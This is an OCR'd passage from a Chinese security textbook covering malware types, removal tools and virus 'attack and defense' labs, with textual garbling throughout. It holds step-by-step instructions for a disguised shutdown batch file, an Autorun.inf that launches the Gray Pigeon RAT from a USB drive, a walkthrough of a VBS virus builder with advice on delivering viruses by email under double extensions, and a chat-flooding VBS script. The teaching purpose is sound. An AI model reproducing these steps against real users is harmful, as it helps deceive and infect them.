病毒 清除 新 技术 和 新 发 展 主要 体现 在 以 下 几 个 方面 。 

(1) 实时 监测 技术 。 可 以 实时 监测 系统 中 的 病毒 活动 ,系统 状况 ,以 及 因特网 .电子 邮 
件 上 和 存储 介质 的 病毒 传播 ,将 病毒 阻止 在 操作 系统 之 外 。 

(2) 自动 解压 缩 技术 。 可 避免 只 能 查 不 能 消除 压缩 文件 的 病毒 问题 。 
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(3) 跨 平台 防 病毒 技术 。 在 不 同 平台 上 使 用 跨 平台 防 病毒 软件 。 

(4) 云端 杀毒 。 终端 用 户 与 云端 服务 器 保持 实时 联络 , 当 发 现 异常 行为 或 病毒 后 ,自动 
提交 到 云端 的 服务 器 群 组 中 ,由 云 计算 技术 进行 集中 分 析 、 识 别 和 查 杀 处 理 。 

(5) 其 他 防范 管理 新 方法 。 主 要 包括 : 完善 产品 体系 及 提高 病毒 检测 率 、 功 能 完善 的 控 
制 台 ,减少 通过 广域网 流量 管理 .实时 防范 能 力 、 快 速 及 时 的 病毒 特征 码 升 级 。 


4.3 恶意 软件 概述 与 清除 


从 广义 上 讲 ,计算机 病毒 也 是 恶意 软件 的 一 种 。 目 前 ,为 了 具体 分 析 研 究 计算 机 病毒 ， 
通常 将 恶意 软件 与 计算 机 病毒 在 狭义 上 加 以 区 别 ,讨论 恶意 软件 旨 在 保证 系统 正常 运行 。 


j> 4.3.1 恶意 软件 概述 


有 1. 恶意 软件 的 概念 


恶意 软件 也 称 恶 意 代码 ,具有 扰乱 系统 正常 运行 和 操作 功能 的 程序 。 从 广义 上 讲 ， 
计算 机 病毒 也 是 恶意 软件 的 一 种 。 狭 义 上 恶意 软件 是 介 于 病毒 和 正规 软件 之 间 的 程 
序 。 一 般 同时 具有 下 载 、. 媒 体 播放 等 正常 功能 和 自动 弹出 ` 开 后 门 、 难 清除 等 恶意 行为 ， 
经 常 给 广大 计算 机 用 户 带 来 一 定 的 干扰 和 麻烦 。 其 共同 的 特征 是 未 经 用 户 许可 强行 潜入 
用 户 计算 机 中 ,而 且 无 法 正常 卸载 和 删除 ,经 常 删除 后 又 自动 生成 ,因此 ,也 被 称 为 “ 流 谍 
软件 ”。 


有 2. 恶意 软件 的 分 类 


按照 恶意 软件 的 特征 和 危害 可 以 分 为 6 类 。 

1) 广告 软件 (Adware) 

广告 软件 是 指 未 经 用 户 允 许 , 下 载 并 安装 在 用 户 计算 机 上 。 或 与 其 他 软件 捆绑 ,通过 弹 
出 式 广告 等 形式 牟取 商 业 利益 的 程序 。 一 般 会 强制 安装 并 无 法 卸载 。 通 过 在 后 台 收 集 用 户 
信息 牟利 ,危及 用 户 隐 私 。 频 繁 弹出 广告 ,消耗 系统 资源 ,使 其 运行 变 慢 等 。 用 户 安装 了 图 
片 下 载 软件 后 ,经 常会 一 直 弹 出 带 有 广告 的 窗口 ,干扰 正常 使 用 。 还 有 的 软件 安装 后 ,在 IE 
浏览 器 的 工具 栏 位 置 添加 与 其 功能 不 相干 的 广告 图 标 , 难 以 清除 。 

2) 间谍 软件 (Spyware) 

间谍 软件 是 一 种 能 够 在 用 户 不 知情 时 ,在 其 计算 机 上 安装 后 门 程序 并 收集 用 户 信 息 的 
一 种 木马 程序 。 用 户 的 隐私 数据 和 重要 信息 被 其 捕获 ,并 被 发 送 给 黑客 、 商 业 公 司 等 。 这 些 
“后 门 程序 ”甚至 使 用 户 的 计算 机 被 远程 操控 ,组 成 庞大 的 “僵尸 网 络 ”。 

3) 浏览 器 动 持 

浏览 器 动 持 是 一 种 恶意 程序 ,通过 浏览 器 插件 ,浏览 器 辅助 对 象 BHO、Winsock LSP 等 
形式 对 用 户 的 浏览 器 进行 自 改 .使 浏览 器 配置 不 正常 ,被 强行 引导 到 商业 网 站 。 
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4) 行为 记录 软件 (Track Ware) 

行为 记录 软件 是 指 未 经 用 户 许 可 ,窃取 并 分 析 用 户 隐私 数据 ,记录 用 户 计算 机 使 用 习 
惯 、 网 络 浏览 习惯 等 个 人 行为 的 软件 。 和 危及 用 户 隐 私 , 可 被 黑客 利用 进行 网 络 诈骗 。 

5) 恶意 共享 软件 (Malicious Shareware) 

恶意 共享 软件 是 指 为 了 获 利 , 采 用 诱骗 等 手段 让 用 户 注册 ,或 在 软件 体内 捆绑 各 类 恶意 
插件 ,未 经 允许 即将 其 安装 到 用 户 机 器 。 如 强迫 用 户 进 行 注册 ,否则 会 丢失 个 人 资料 或 数 
据 。 结 果 可 能 造成 用 户 浏览 器 被 支持 .隐私 被 窃取 或 敲诈 等 。 还 有 的 用 户 安装 某 媒 体 播放 
软件 后 ,不 给 提示 被 安装 其 他 软件 (搜索 插件 、 下 载 软件 ) , 印 载 时 却 驻 留 其 附加 。 

6) 其 他 “ 流 训 软 件 ” 

随 着 网 络 的 发 展 ,“ 流 谍 软 件 ” 的 分 类 也 越 来 越 多 ,一 些 新 种 类 的 流 谍 软件 在 不 断 出 现 。 


ls. 恶意 软件 的 危害 


1) 强制 弹出 广告 

一 般 弹 出 广告 的 恶意 软件 较 隐 蔽 ,在 用 户 的 桌面 、 程 序 组 中 无 快捷 方式 ,有 的 甚至 隐藏 
了 系统 进程 ,使 用 户 很 难 发 觉 。 既 占据 用 户 的 带宽 ,又 经 常 弹出 广告 影响 正常 操作 。 

2) 动 持 浏览 器 

一 些 不 良 网 站 带 有 很 多 欺骗 性 质 的 链接 ,引诱 用 户 点 击 , 点 击 后 自动 在 后 台 下 载 、 安 装 
程序 或 代码 ,不仅 更 改 浏览 器 默认 首页 及 搜索 引擎 ,强迫 用 户 改 变 使 用 习惯 ,造成 不 便 。 

3) 后 台 记 录 

有 的 软件 以 “免费 在 线 升级 ”为 诱 乌 ,其 插件 可 以 在 很 短 的 间隔 扫描 (访问 ) 某 个 域名 。 
在 提升 网 站 排名 的 同时 记录 了 用 户 的 使 用 习惯 以 图 不 轨 。 

4) 强制 改写 系统 文件 

一 些 软件 虽 不 具备 恶意 软件 的 明显 特征 ,但 在 安装 时 ,会 替换 掉 用 户 系 统 中 原 系 统 文 
件 。 其 制作 粗糙 , 令 用 户 操作 系统 极为 不 稳定 ,严重 时 可 能 会 引起 系统 瘫痪 。 


PP 4.3.2 恶意 软件 的 清除 


一 份 网 络 调查 显示 ,用 户 基本 都 受到 过 流氓 软件 侵扰 ,而 且 难 以 印 载 。 

利用 恶意 软件 清除 工具 进行 清理 ,如 微软 公司 的 恶意 软件 删除 工具 (KB890830) 恶意 
软件 清理 助手 .360 安全 卫士 .超级 巡警 ( 云 查 杀 )、Windows 清理 助手 等 ,其 使 用 方法 较为 
简单 。 

例如 ,在 网 上 搜索 下 载 MiniPGP 软件 ,从 网 上 下 载 的 文件 不 是 压缩 包 , 而 是 MiniPGP_1 
@54445. exe 可 执行 文件 。 运 行 此 文件 ,安装 界面 如 图 4-1 所 示 。 直 接 单 击 “ 快 速 安装 ”按钮 
安装 程序 ,很 多 时 候 会 默认 安装 很 多 程序 。 可 以 用 第 2 章 中 安装 的 虚拟 机 先 做 一 下 快照 备 
份 , 再 默认 安装 此 程序 试 一 下 。 
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MiniPGP 


软件 大 小 ; 684KB 

人 气 指数 : 7803 

软件 语言 : 简体 中 文 

软件 评级 : 广 商 疝 食 

安全 检测 : 加 360 亲 南通 过 


轩 QqtSii 过 

fy 全 证 雪 通 过 
软件 简介 : 
anbsp:aanbsp:&unbsp;&tnbsp:PGP 是 个 很 好 用 的 文件 加 解 齐 工具 但 是 其 体积 好 加 看 看 
过 于 遍 大 不 便于 痪 芝 . 导 到 很 多 朋友 站 而 和 上 本 软 件 匡 名 思 义 是 PGPH 解 密 工 
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图 4-1 下 载 的 软件 包括 安装 其 他 程序 陷阱 


对 于 此 类 应 用 程序 ,在 实际 安装 时 ,至 少 要 把 程序 选中 的 同时 将 安装 软件 的 默认 项 去 
除 , 但 建议 更 换 下 载 的 链接 ,直接 选择 下 载 压缩 文件 ,下 载 时 看 一 下 文件 的 大 小 。 


4.4 计算 机 病毒 攻防 实例 


计算 机 病毒 可 以 很 快 地 蔓延 ,又 常常 难以 根除 ,也 是 黑客 常用 的 攻击 目标 计算 机 的 手 
段 。 所 以 了 解 病毒 的 特点 ,做 好 预防 工作 非常 重要 。 


> 4.4.1 简单 病毒 生成 和 防范 


真正 的 病毒 一 般 都 具有 传染 性 、 隐 藏 性 和 破坏 性 。 下 面 以 Restart 病毒 和 U 盘 病 毒 的 
生成 过 程 ,介绍 有 效 的 防范 措施 。 


Li. Restart 病毒 生成 和 防范 


平时 在 使 用 计算 机 过 程 中 或 许 碰 到 过 计算 机 不 断 重启 的 情况 ,Restart 病毒 就 是 一 种 能 
够 让 计算 机 重新 启动 的 病毒 ,该 病毒 主要 通过 DOS 命令 shutdown /r 来 实现 。 具 体操 作 步 
又 如 下 。 

(1) 在 桌面 上 新 建 一 个 空白 文本 文件 。 

(2) 打开 文件 ,并 输入 shutdown /r。 保 存 文件 ,并 重 命名 为 扩展 名 是 . bat 的 可 执行 
交 件 。 

(3) 为 BAT 文件 创建 快捷 方式 到 桌面 .并重 名 快捷 方式 为 “腾讯 QQ”。 右 击 此 快捷 方 
式 , 选 择 “ 属 性 ”命令 。 为 此 快捷 方式 更 换 图 标 。 

(4) 选择 “快捷 方式 ”选项 卡 , 单 击 更改 图 标 ” 按 钮 ,会 弹出 提示 对 话 框 , 单 击 “ 确 定 ” 按 
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钮 ,打开 “更 改 图 标 ” 对 话 框 。 

(5) 搜索 “QQ ico 图 标 ”, 下载 腾讯 QQ 桌面 快捷 方式 的 图 标 文件 。 

(6) 删除 原 有 QQ 图 标 , 用 下 载 的 ICO 文件 ,更 改 为 “腾讯 QQ"” 快 捷 方 式 的 图 标 。 并 把 
桌面 上 的 BAT 文件 设置 为 隐藏 。 然 后 在 “文件 夹 ” 选 项 中 ,在 “查看 ”选项 卡 中 ,设置 “不 显示 
隐藏 的 文件 文件 夹 或 驱动 器 ”。 当 然 , 也 可 以 不 把 BAT 文件 放 在 桌面 上 ,再 为 它 创建 快捷 
方式 。 

(7) 在 桌面 上 双击 创建 的 “腾讯 QQ" 快 捷 方式 ,执行 命令 ,结果 如 图 4-2 所 示 。 


企 Windows 将 在 一 分 钟 内 关闭 。 
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图 4-2 Windows 7 下 运行 结果 














2. 盘 病毒 生成 和 防范 


U 盘 病 毒 又 称 Autorun 病毒 ,就 是 通过 U 盘 , 产 生 AutoRun. inf 进行 传播 的 病毒 , 随 着 
U 盘 、 移 动 硬盘 存储 卡 等 移动 存储 设备 的 普及 ,U 盘 病 毒 已 经 成 为 比较 流行 的 计算 机 病毒 
之 一 。U 盘 病 毒 并 不 是 只 存在 于 U 盘 上 ,中 毒 的 计算 机 每 个 分 区 下 面 同样 有 U 盘 病 毒 , 计 
算 机 和 U 盘 交 叉 传 播 。 

病毒 首先 向 U 盘 写 人 病毒 程序 ,然后 更 改 Autorun. inf 文件 。Autorun. inf 文件 记录 用 
户 选择 何 种 程序 来 打开 U 盘 。 如 果 Autorun. inf 文件 指向 了 病毒 程序 ,那么 Windows 就 会 
运行 这 个 程序 ,引发 病毒 。 一 般 病毒 还 会 检测 插入 的 U 盘 , 并 对 其 实行 上 述 操作 ,导致 一 个 
新 的 病毒 U 盘 的 诞生 。 

具体 操作 过 程 如 下 。 

1) 制作 简单 的 U 盘 病 毒 

(1) 直接 拖 动 病毒 或 木马 程序 (如 “ 灰 蚀 子 . exe”) 到 U 盘 ,在 U 盘 中 新 建文 本 文件 ,并 重 
命名 为 Autorun. inf。 

(2) 用 记事 本 打开 Autorun. inf 文件 ,编辑 文件 代码 ,使 双击 U 盘 图 标 后 运行 指定 程 
序 。 文 件 代 码 如 下 。 

[AutoRun] 

OPEN = 灰 鸽 子 . exe 


shellexecute = 灰 锐 子 . exe 
shell\Auto\command = 灰 饮 子 .exe 


(3) 把 Autorun. inf 和 “ 灰 鸟 子 . exe” 文 件 设置 为 隐藏 ,并 在 “文件 夹 ” 选 项 中 ,在 “查看 ” 
选项 卡 中 ,设置 “不 显示 隐藏 的 文件 ,文件 夹 或 驱动 器 ”选项 。 
畏 注 意 : 在 练习 时 ,可 以 用 一 个 Windows 的 命令 代 普 木 马 程序 运行 。 
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(4) 将 口 盘 接 入 计算 机 中 , 右 击 U 盘 对 应 盘 符 ,在 快捷 菜单 中 会 出 现 Auto 命令 ,表示 
设置 成 功 。 

2) 防范 U 盘 病 毒 

(1) 防范 U 盘 病毒 的 最 好 办 法 也 是 实用 性 最 小 的 办 法 ,就 是 不 将 U 盘 插 到 安全 性 不 明 
的 计算 机 中 ,但 是 这 几乎 是 不 可 能 达到 的 。 

(2) 设置 显示 隐藏 文件 文件 夹 和 驱动 器 ,并 取消 隐藏 已 知 文件 的 扩展 名 选项 。 这 可 以 
有 效 防止 木马 伪装 为 文件 夹 及 正常 文件 诈骗 用 户 点 击 。 

例如 ,在 默认 隐藏 已 知 文件 的 扩展 名 的 设置 下 ,实际 的 病毒 文件 “风景 . jpg. exe” 在 计算 
机 中 显示 的 是 "风景 . jpg”。 当 然 ,“ 风 景 . exe. jpg” 也 不 要 随便 点 击 , 这 有 可 能 是 Unicode 反 转 。 

(3) 对 付 自动 运行 (Autorun) 类 及 利用 系统 漏洞 的 病毒 ,最 简单 的 是 安装 微软 的 补丁 ， 
一 般 使 用 360 安全 卫士 自动 修复 漏洞 就 可 以 了 。 而 自动 运行 (Autorun) 类 病毒 从 Windows 7 
系统 开始 ,这 方面 的 安全 就 已 经 完善 了 。 

(4) 安装 360 安全 卫士 及 360 杀毒 .金山 毒霸 、QQ 管家 等 软件 。 


> 4.4.2 脚本 病毒 生成 和 防范 


脚本 病毒 是 主要 采用 脚本 语言 设计 的 计算 机 病毒 。 现 在 流行 的 脚本 病毒 大 都 是 利用 
JavaScript 和 VBScript 脚本 语言 编写 。 但 是 在 脚本 应 用 无 所 不 在 的 今天 ,脚本 病毒 却 成 为 
危害 最 大 、 最 为 广泛 的 病毒 ,特别 是 当 它 们 和 一 些 传统 的 进行 恶性 破坏 的 病毒 如 CIH 相 结 
合 时 其 危害 就 更 为 严重 了 。 随 着 计算 机 系统 软件 技术 的 发 展 ,新 的 病毒 技术 也 应 运 而 生 , 特 
别 是 结合 脚本 技术 的 病毒 更 让 人 防不胜防 ,由 于 脚本 语言 的 易 用 性 ,并 且 脚 本 在 现在 的 应 用 
系统 中 特别 是 Internet 应 用 中 占据 了 重要 地 位 ,脚本 病毒 也 成 为 互联 网 病毒 中 最 为 流行 的 
网 络 病毒 。 

脚本 病毒 的 前 级 是 Script。 脚 本 病毒 的 公有 特性 是 使 用 脚本 语言 编写 ,通过 网 页 进行 
传播 的 病毒 ,如 红色 代码 (Script. Redlof) 脚 本 病毒 通常 有 前 级 VBS 或 JS( 表 明 是 何 种 脚本 
编写 的 ) ,如 欢乐 时 光 (VBS. Happytime) ,十 四 日 (JS. Fortnight. c. s) 等 。 


EL VBS 脚本 病毒 生成 机 


现在 网 络 中 还 流行 如 “VBS 脚本 病毒 生成 机 ”这 类 自动 生成 脚本 语言 的 软件 ,让 用 户 无 
须 编程 知识 就 可 以 制造 出 一 个 VBS 脚本 病毒 。 具 体操 作 步 骤 如 下 。 

(1) 下 载 并 解压 “病毒 制造 机 ”压缩 文件 。 解 压 后 直接 运行 Virl. exe 文件 。 

(2) 单 击 “下 一 步 ? 按 钮 ,设置 病毒 复制 选项 .如 图 4-3 所 示 。 

(3) 设置 禁止 功能 选项 ,此 项 内 容 可 根据 制作 病毒 的 特点 选择 ,如 图 4-4 所 示 。 

在 图 4-4 中 ,如 果 选 择 “ 开 机 自动 运行 ”项 ,病毒 将 自身 加 入 注册 表 中 ,并 伴随 系统 启动 
悄悄 运行 ; 如 果 选 择 “ 隐 藏 盘 符 “禁止 使 用 注册 表 编 辑 器 ”禁用 “控制 面板 '” 等 项 , 则 可 让 
对 方 开机 后 找 不 到 硬盘 分 区 ,无 法 运行 注册 表 编 辑 器 .无 法 打开 控制 面板 等 。 

(4) 设置 病毒 提示 。 可 设置 开机 提示 框 的 标题 和 内 容 。 
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国 庆生 却 8 机 v10 (=. 国 二 v0 (= 
第 二 步 病毒 复制 选项 第 三 步 禁止 功能 选项 
回 禁止 “运行 "菜单 
回 员 制 请 吉本 到 trinoys 文 伯 赤 (YDiDOYS/ITRIT》 I 直 汪汪 
回 ”复制 病毒 副本 到 系统 文件 夫 (SYSTEM/SYSTEM32) 口 隐藏 名 符 
口 禁止 使 用 注册 未 编辑 器 口 禁止 “任务 栏 和 开始 ” 
回 | 可 制 席 考 副 本 到 启动 菜单 口 禁止 注册 表 扫 指 口 禁止 右键 菜单 
口 禁止 “注销 ”菜单 口 禁用 “控制 面板 ” 
本 Mk 文 Hg: Ersm 口 禁 上 进入 wsS-D0s 实 模式 口 禁止 使 用 下 文件 (危险 ) 
MW YE- 步 | 2 下 涂 MW TEL- 步 | nT 下- 几 
图 4-3 病毒 制造 机 的 病毒 复制 选项 图 4-4 ”病毒 制造 机 的 禁止 功能 选项 


(5) 设置 病毒 传播 途径 。 可 设置 通过 电子 邮件 进行 自动 传播 ,并 可 设置 发 送 带 病毒 邮 
件 地 址 的 数量 。 


(6) 单 击 “ 下 一 步 "按钮 后 ,设置 IE 修改 选项 ,如 图 4-5 所 示 。 
瓦 二 (ls) 
上 第 六 步 IE 修改 选项 
| 回 禁用 IF 右键 菜单 禁止 更 约 历史 记录 设置 
回 禁止 nternet 选 项 回 禁止 Internet 连 接 向 导 
口 禁用 “另存 为 ... ”菜单 口 [ 衣 次 对 认 主页 
口 禁用 “文件 \ 打 开 "” 菜单 ” 口 禁止 安全 项 

口 禁止 更 改 高 级 页 设置 口 禁止 “ 重 置 #eb 设 置 ” 
|| 口 禁止 更 改 临 H 文 件 设置 。 口 禁止 查看 源 文件 


口 禁止 更 改 自动 配置 口 禁止 添加 陪 机 页 计划 
口 禁止 更 改 主页 口 禁止 资源 管理 器 中 文件 菜单 


Mh YE -i 
图 4-5 ”病毒 制造 机 的 IE 修改 选项 


(7) 设置 病毒 文件 存放 的 位 置 .并 开 好 制造 生成 病毒 。 

病毒 生成 之 后 ,如 何 让 病毒 在 对 方 计算 机 上 运行 呢 ? 有 许多 种 方法 ,如 修改 文件 名 ,使 
用 双 后 级 的 文件 名 “病毒 . txt. vbs” 等 .再 通过 邮件 附件 发 送出 去 。 

在 用 此 软件 生成 病毒 的 同时 ,会 产生 一 个 名 为 reset. vbs 的 恢复 文件 ,如 果 不 小 心 运行 
了 病毒 ,在 系统 不 能 正常 工作 时 ,可 以 用 恢复 文件 来 解救 。 

当然 ,在 运行 病毒 时 ,一 般 是 在 虚拟 机 的 环境 下 运行 的 ,还 可 以 用 快照 还 原 等 方式 解救 。 















2. 用 VBS 脚本 病毒 刷 QQ 群 聊天 屏 


VBS 脚本 语言 功能 强大 ,使 用 简单 ,以 下 介绍 一 个 可 以 自动 刷 QQ 群 聊天 屏 的 VBS 病 
毒 工具 的 制作 过 程 。 具体 操作 步 又 如 下 。 

1) 生成 VBS 脚本 

新 建文 本 文件 ,输入 以 下 代码 。 


——@ 
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set WshShell = WScript. CreateObject( "WScript. Shell") 
WshShell. AppActivate " 群 名 称 " 

for i=1to5 

WScript. Sleep 500 

WshShell. SendKeys "^v" 

WshShell. SendKeys i 

WshShell. SendKeys "% s" 


Next 

其 中 ,for 循环 语句 是 用 来 控制 发 送 次 数 的 。 对 于 几 个 控制 键 是 有 如 下 规定 的 。 
2 WshShell. SendKeys "+" 

上 WshShell. SendKeys "^" 

二 WshShell. SendKeys "%" 


将 文件 保存 为 以 . vbs 为 扩展 名 的 脚本 文件 。 

2) 刷 QQ 群 聊天 屏 

打开 一 个 群 聊天 窗口 , 先 复制 一 段 文件 ,代码 就 会 执行 粘贴 快速 回复 等 操作 。 

对 于 一 些 不 会 生成 字符 的 控制 功能 按键 ,需要 使 用 大 括号 括 起 来 按键 的 名 称 。 如 果 发 
送 是 基本 字符 用 ”" 括 起 来 。 

如 要 发 送 Enter 键 ,需要 用 WshShell. SendKeys "{ENTER}) "表示 。 

发 送 向 下 的 方向 键 用 WshShell. SendKeys"{DOWN)" 表 示 。 

要 打开 计算 器 ,可 以 用 WshShell. Run "calc" 表 示 。 

大 家 可 以 试 一 试 , 写 一 个 VBS ,运行 的 结果 可 以 显示 在 记事 本 中 。 


> 4.4.3 宏 病 毒 与 邮件 病毒 防范 


宏 病 毒 与 邮件 病毒 是 广大 用 户 经 常 遇 到 的 病毒 ,如 果 中 了 这 些 病毒 就 可 能 造成 重大 
损失 。 


有 1. 宏 病 毒 的 判断 方法 


虽然 不 是 所 有 包含 宏 的 文档 都 包含 了 宏 病 毒 ,但 当 出 现下 列 情况 之 一 时 , 则 可 以 断定 该 
Office 文档 或 Office 系统 中 有 宏 病 毒 。 

(1) 在 打开 “ 宏 病 毒 防 护 功能 ”的 情况 下 , 当 打 开 一 个 自己 编辑 的 文档 时 ,系统 会 弹出 相 
应 的 警告 对 话 框 。 然 而 ,实际 上 并 没有 在 其 中 使 用 宏 或 并 不 知道 到 底 怎 么 用 宏 ,那么 就 可 以 
肯定 该 文档 已 经 感染 了 宏 病 毒 。 

(2) 在 打开 “ 宏 病 毒 防护 功能 ”的 情况 下 ,Office 文档 中 一 系列 的 文件 都 在 打开 时 给 出 宏 
警告 。 如 果 用 户 很 少 使 用 到 宏 ,那么 当 看 到 成 串 的 文档 有 宏 警 告 时 ,可 以 肯定 这 些 文档 中 有 
宏 病 毒 。 

(3) Word 中 提供 了 对 宏 病 毒 的 防范 功能 ,但 有 些 宏 病 毒 为 了 对 付 Office 中 提供 的 宏 警 
告 功能 ,在 感染 系统 (通常 只 有 在 用 户 关闭 了 宏 病毒 防范 选项 或 者 出 现 宏 警告 后 不 留神 选取 
了 “启用 宏 ” 才 有 可 能 ) 后 .会 在 用 户 每 次 退出 Office 时 自动 屏蔽 掉 宏 病毒 防范 选项 。 因 此 ， 
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用 户 一 旦 发 现 自己 设置 的 宏 病 毒 防范 功能 选项 无 法 在 两 次 启动 Word 之 间 保 持 有 效 , 则 可 
以 肯定 自己 的 系统 感染 了 宏 病 毒 。 也 就 是 说 ,一 系列 Word 模板 ,特别 是 normal. dot 已 经 被 
感染 。 

有 时 ,为 了 工作 方便 也 用 VBA(Visual Basic for Applications 是 Visual Basic 的 一 种 宏 
语言 ) 进 行 Office 文档 的 编程 。 此 时 也 有 可 能 会 错 报 为 宏 病 毒 。 


有 2 防范 与 清除 宏 病毒 


针对 宏 病 毒 的 预防 和 清除 操作 方法 很 多 ,下 面 介绍 两 种 方法 。 

1) 使 用 反 病 毒 软件 

使 用 反 病 毒 软件 是 一 种 高 效 、 安 全 和 方便 的 清除 方法 ,也 是 一 般 计 算 机 用 户 的 首选 方 
法 。 但 使 用 通用 的 反 病毒 软件 不 一 定 能 查 出 宏 病毒 ,这 方面 的 突出 例子 就 是 ETHAN 宏 病 
毒 。 ETHAN 宏 病 毒 相 当 隐 蔽 ,用 户 使 用 较 新 版 本 的 反 病毒 软件 都 可 能 无 法 查 出 。 此 外 ,这 
个 宏 病 毒 能 够 悄悄 取消 Word 的 宏 病 毒 防范 功能 ,并 且 某 些 情况 下 会 把 被 感染 的 文档 置 为 
只 读 属 性 ,从 而 更 好 地 隐藏 自己 。 

因此 ,对 付 宏 病 毒 应 该 和 对 付 其 他 种 类 的 病毒 一 样 ,也 要 尽量 使 用 最 新 版 的 反 病毒 软 
件 。 无 论 用 户 使 用 的 是 何 种 反 病 毒 软件 ,及 时 升级 病毒 库 都 是 非常 重要 的 。 

2) 应 急 处 理 方法 

如 果 用 户 的 Word 没有 感染 宏 病毒 ,但 需要 打开 某 个 外 来 的 .已 查 出 感染 宏 病毒 的 文 
档 ,而 手头 的 反 病 毒 软件 又 无 法 查 杀 它们 ,就 可 以 尝试 用 写字 板 或 Word 文档 作为 清除 宏 病 
毒 的 桥梁 来 查 杀 文 档 中 的 宏 病毒 : 打开 感染 了 宏 病 毒 的 文档 (启用 Word 的 宏 病 毒 防范 功能 
并 在 宏 警 告 出 现时 选择 “取消 宏 ”) ,选择 “文件 ”一 “另存 为 ”命令 ,将 此 文档 存 成 写字 板 
(RTF) 格 式 或 Word 格式 。 

在 上 述 方法 中 , 存 成 写字 板 格式 是 利用 RTF 文档 格式 没有 宏 的 特点 , 存 成 Word 格式 
则 是 利用 Word 文档 在 转换 格式 时 会 失去 宏 的 特点 。 写 字 板 所 用 的 RTF 格式 适用 于 文档 
中 仅 有 文字 和 图 片 的 情况 ,如 果 文 档 中 除了 文字 、 图 片 还 有 图 形 或 表格 , 则 按 Word 格式 保 
存 一 般 不 会 失去 这 些 内 容 。 存 盘 后 应 该 检查 一 下 文档 的 完整 性 ,如 果 文 档 内 容 没有 任何 丢 
失 , 并 且 在 重新 打开 此 文档 时 不 再 出 现 宏 警告 则 大 功 告 成 。 





由 3. 全面 防御 邮件 病毒 


邮件 病毒 是 通过 电子 邮件 方式 进行 传播 的 病毒 的 总 称 。 电 子 邮件 传播 病毒 通常 是 把 自 
己 作为 附件 发 送 给 被 攻击 者 ,如 果 收 到 该 邮件 的 用 户 不 小 心 打 开 了 附件 ,病毒 就 会 感染 本 地 
计算 机 。 另 外 ,由 于 电子 邮件 客户 端 程序 的 一 些 漏洞 .也 可 能 被 攻击 者 利用 来 传播 电子 邮件 
病毒 ,微软 的 Outlook Express 就 曾经 因为 两 个 漏洞 可 以 被 攻击 者 编制 特制 的 代码 ,使 收 到 
邮件 的 用 户 不 需要 打开 附件 , 即 可 自动 运行 病毒 文件 。 

在 了 解 了 邮件 病毒 的 传染 方式 后 ,用 户 就 可 以 根据 其 特性 制定 出 相应 的 防范 措施 。 

(1) 安装 反 病毒 软件 。 防 御 病毒 感染 的 最 佳 方法 就 是 安装 反 病 毒 软件 并 及 时 更 新 。 反 
病毒 软件 可 以 扫描 传人 的 电子 邮件 中 的 已 知 病毒 .并 防止 这 些 病 毒 感染 计算 机 。 新 病毒 几 
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平 每 天 都 会 出 现 , 因 此 需要 及 时 更 新 反 病毒 软件 。 多 数 反 病毒 软件 都 可 以 设置 为 定期 自动 
更 新 ,以 具备 需要 与 最 新 病毒 进行 斗争 的 信息 。 

(2) 打开 电子 邮件 附件 时 要 非常 小 心 。 电 子 邮件 附件 是 主要 的 病毒 感染 源 。 例 如 ,用 
户 可 能 会 收 到 一 封 带 有 附件 的 电子 邮件 (发 送 者 可 能 是 自己 认识 的 人 ) ,该 附件 被 伪装 为 文 
档 、 照 片 或 程序 ,但 实际 上 是 病毒 。 如 果 打开 该 文件 ,病毒 就 会 感染 计算 机 。 如 果 收 到 意外 
的 电子 邮件 附件 ,可 在 打开 附件 之 前 先 答复 发 件 人 , 问 清 是 否 确 实 发 送 了 这 些 附件 。 

(3) 使 用 反 病 毒 软件 检查 压缩 文件 内 容 。 病 毒 编写 者 将 恶意 文件 潜入 计算 机 中 的 一 种 
方法 是 使 用 压缩 文件 格式 (如 . zip 或 . rar 格式 ) 将 文件 作为 附件 发 送 。 多 数 反 病毒 软件 会 在 
接收 到 附件 时 进行 扫描 ,但 为 了 安全 起 见 ,应 该 将 压缩 的 附件 保存 到 计算 机 的 一 个 文件 夹 
中 ,在 打开 其 中 所 包含 的 任何 文件 之 前 先 使 用 防 病毒 程序 进行 扫描 。 

(4) 单 击 邮 件 中 的 链接 时 须 谨慎 。 电 子 邮 件 中 的 欺骗 性 链接 通常 作为 仿冒 和 间谍 软件 
骗局 的 一 部 分 使 用 ,但 也 会 用 来 传输 病毒 。 单 击 欺骗 性 链接 会 打开 一 个 网 页 ,该 网 页 将 试图 
让 计算 机 下 载 恶 意 软 件 。 因 此 在 单 击 邮件 中 的 链接 时 要 格外 小 心 ,尤其 是 邮件 正文 看 上 去 
含糊 不 清 , 如 邮件 上 写 着 “查看 我 们 的 假期 图 片 ”, 但 没有 标识 用 户 或 发 件 人 的 个 人 信息 。 


> 4.4.4 ”全面 防范 网 络 蠕虫 


与 传统 的 病毒 不 同 , 蠕 虫 病毒 以 计算 机 为 载体 ,以 网 络 为 攻击 对 象 ,网 络 蠕虫 病毒 可 分 
为 利用 系统 级 别 漏洞 (主动 传播 ) 和 利用 社会 工程 学 (欺骗 传播 ) 两 种 。 在 宽带 网 络 迅速 普及 
的 今天 ,蠕虫 病毒 在 技术 上 已 经 能 够 成 熟地 利用 各 种 网 络 资源 进行 传播 。 所 以 ,了 解 晴 虫 病 
毒 的 特点 并 做 好 防范 非常 有 必要 。 


有 1. 网 络 蠕虫 病毒 实例 分 析 


目前 ,产生 严重 影响 的 蠕虫 病毒 有 很 多 ,如 “英里 斯 蠕虫 “美丽 杀手 ”* 爱 虫 病毒 “红色 
代码 “ 尼 姆 亚 “ 求 职 信 ” 和 “蠕虫 王 ” 等 ,它们 都 给 人们 留 下 了 深刻 的 印象 。 

1) Guapim 蠕虫 病毒 

Guapim(Worm. Guapim) 蠕 虫 病毒 的 特征 为 通过 即时 聊天 工具 和 文件 共享 网 络 传 播 的 
蠕虫 病毒 。 发 作 时 ,病毒 在 系统 目录 下 释放 病毒 文件 System32%\pkguar d32. exe, 并 在 注 
册 表 中 添加 特定 键 值 以 实现 自 启动 。 该 病毒 会 给 MSN、QQ 等 聊天 工具 的 好 友 发 送 诱惑 性 
消息 :“Hehe. takea look at this funny game http:// XX XX//Monkye. exe”, 同 时 假借 
HowtoHack. exe, HalfLife2FULL. exe、 WindowsXP. exe、VisualStudio2005. exe 等 文件 名 
复制 自身 到 文件 共享 网 络 ,并 试图 在 Internet 上 下 载 执 行 另 一 个 蠕虫 病毒 ,直接 降低 系统 安 
全 设置 ,给 用 户 的 正常 操作 带 来 极 大 的 隐患 。 

2) 安 菜 普 蠕虫 病毒 

